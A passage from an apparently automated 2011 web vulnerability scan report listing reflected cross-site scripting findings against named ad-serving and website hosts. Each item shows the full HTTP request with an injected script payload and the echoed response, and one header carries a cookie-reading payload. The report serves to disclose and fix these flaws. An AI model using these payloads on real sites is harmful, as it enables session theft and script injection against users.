GET /servlet1bfba<script>alert(1)</script>20f5747086d/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:26:47 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet1bfba<script>alert(1)</script>20f5747086d/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ not found</pre>
...[SNIP]...

4.469. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82c11<script>alert(1)</script>7831f1e4291 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator82c11<script>alert(1)</script>7831f1e4291/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:26:48 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator82c11<script>alert(1)</script>7831f1e4291/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ not found</pre>
...[SNIP]...

4.470. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63733/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2558<script>alert(1)</script>78040661ac4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servletb2558<script>alert(1)</script>78040661ac4/ajrotator/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:24:06 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servletb2558<script>alert(1)</script>78040661ac4/ajrotator/63733/0/vj not found</pre>
<BR>

4.471. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63733/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8bcf<script>alert(1)</script>3fa33f2659 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatord8bcf<script>alert(1)</script>3fa33f2659/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:24:07 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatord8bcf<script>alert(1)</script>3fa33f2659/63733/0/vj not found</pre>
<BR>

4.472. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fece'-alert(1)-'9f941c34489 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA.&tt_code=nydailynews.com&udj=uf%28%27a%27%2C+537%2C+1296224069%29%3Buf%28%27c%27%2C+5740%2C+1296224069%29%3Buf%28%27r%27%2C+157830%2C+1296224069%29%3Bppv%28783%2C+%273218538236873087490%27%2C+1296224069%2C+1297520069%2C+5740%2C+25733%29%3B&cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.2fece'-alert(1)-'9f941c34489&referrer=http://www.nydailynews.com/blogs70f75 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=FzXN9?TZi)>y1-^s2mzPD+@4+<i:[v#mk@cE3+b8?jraDJt@%+`'uLM/Dl+8<5/!Ww5LUeE=7?vbgm<6zEk@/WBJ[MOl!9-@aXV4)=rJOM@R5(?)a%ZJ2Wcbf*>2GHpO^8q6y4.W-*y?$3o38q>cC^S[A.LeTUm`>tMe:Vn15)3V9!][_fmn.CQInWmsln_lnhV2sS:M5*3DU7fN@fu#Pa!9L%Hn?en]; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:43:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:43:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:43:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:$78zsR5OeIufidQD2]*](K9'=5f>*@; path=/; expires=Thu, 28-Apr-2011 16:43:35 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 28 Jan 2011 16:43:35 GMT
Content-Length: 830

document.write('<a href="http://ib.adnxs.com/click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.2fece'-alert(1)-'9f941c34489/referrer=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75/clickenc=http%3A%2F%2Fwww.clickability.com%2Fcampaigns%2FExpress_Datasheet.html%3Fsfcid%3D70180000000fUSJ" target="_blank">
...[SNIP]...

4.473. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c05'%3balert(1)//97aa36e20df was submitted in the redir parameter. This input was echoed as 71c05';alert(1)//97aa36e20df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F71c05'%3balert(1)//97aa36e20df HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb675120=5_[r^208WMM2x@N!@@-#sWlnn?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP7pgRDqTLCxwBWHfHSmrEEK1cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnAgBAgUCAAIAAAAAISIIEAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265397%29%3Buf%28%27r%27%2C+116344%2C+1296265397%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5Q%JvMB))2t*-IyS).d*U`>Ok$)gcuXD-L66R1@O4vp]ccG_H+%(u%mQtz*[d<.HEQ2b+)89LT/'^G@=+00].ps-rcmC0]*`Bb^`#V*AM6Ne*R5L=aW-ObhHV=.^C5BoO'uuJk8/]y:]wAdA6qeH?q7qFudKnD[)aHje%=uq$/OH'(wercy6M%TG:^q9-lPoF(NLxEz@; path=/; expires=Fri, 29-Apr-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:43:17 GMT
Content-Length: 691

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-48597195_1296251864,11d765b6a10b1b3,Miscellaneous,cm.cm_aa_gn1-cm.sportsreg-cm.spo
...[SNIP]...
1=199062;contx=Miscellaneous;an=1;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.3579352851957083?71c05';alert(1)//97aa36e20df">
...[SNIP]...

4.474. http://img.mediaplex.com/content/0/14302/119028/social_ponder_728x90.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/social_ponder_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbd33"%3balert(1)//051cb26d260 was submitted in the mpck parameter. This input was echoed as dbd33";alert(1)//051cb26d260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14302/119028/social_ponder_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213dbd33"%3balert(1)//051cb26d260&mpt=3544685213&mpvc=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=&placementid=14302119028289011& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=14302:28901/1551:17023/9609:2042/11293:3113

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:43 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:37:28 GMT
ETag: "78afcc-cbd-4987b11732200"
Accept-Ranges: bytes
Content-Length: 6659
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289011&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
e=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-1?mpt=3544685213dbd33";alert(1)//051cb26d260\" target=\"_blank\">
...[SNIP]...

4.475. http://img.mediaplex.com/content/0/14302/119028/social_ponder_728x90.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/social_ponder_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45d90"%3balert(1)//ae69b85476 was submitted in the mpvc parameter. This input was echoed as 45d90";alert(1)//ae69b85476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14302/119028/social_ponder_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213&mpt=3544685213&mpvc=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=45d90"%3balert(1)//ae69b85476&placementid=14302119028289011& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=14302:28901/1551:17023/9609:2042/11293:3113

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:53 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:37:28 GMT
ETag: "78afcc-cbd-4987b11732200"
Accept-Ranges: bytes
Content-Length: 6622
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289011&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
ashVars\" VALUE=\"clickTAG=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=45d90";alert(1)//ae69b85476http://altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213&clickTag=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,7661
...[SNIP]...

4.476. http://img.mediaplex.com/content/0/14302/119028/social_ponder_728x90.js [placementid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/social_ponder_728x90.js

Issue detail

The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca98"%3balert(1)//f842bdb5210 was submitted in the placementid parameter. This input was echoed as fca98";alert(1)//f842bdb5210 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14302/119028/social_ponder_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213&mpt=3544685213&mpvc=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=&placementid=14302119028289011fca98"%3balert(1)//f842bdb5210& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=14302:28901/1551:17023/9609:2042/11293:3113

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:59 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:37:28 GMT
ETag: "78afcc-cbd-4987b11732200"
Accept-Ranges: bytes
Content-Length: 6299
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289011fca98";alert(1)//f842bdb5210&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">
...[SNIP]...

4.477. http://imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c04"><a>b9169bf5b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?99c04"><a>b9169bf5b73=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIANFYd9Qok%2fkykcMIgmZjKoQL2Fau65ih2OqtICLHe6Q3eP1TKxG1T%2bPy4j2Jq7jhcGjt6%2fBNVb76RzfvkzfqVaz3rHjvWW%2bqEgtHilu1omsK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:33 GMT
Connection: close
Content-Length: 19502
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/?99c04"><a>b9169bf5b73=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.478. http://imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17713'-alert(1)-'0edf03efbd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?17713'-alert(1)-'0edf03efbd6=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
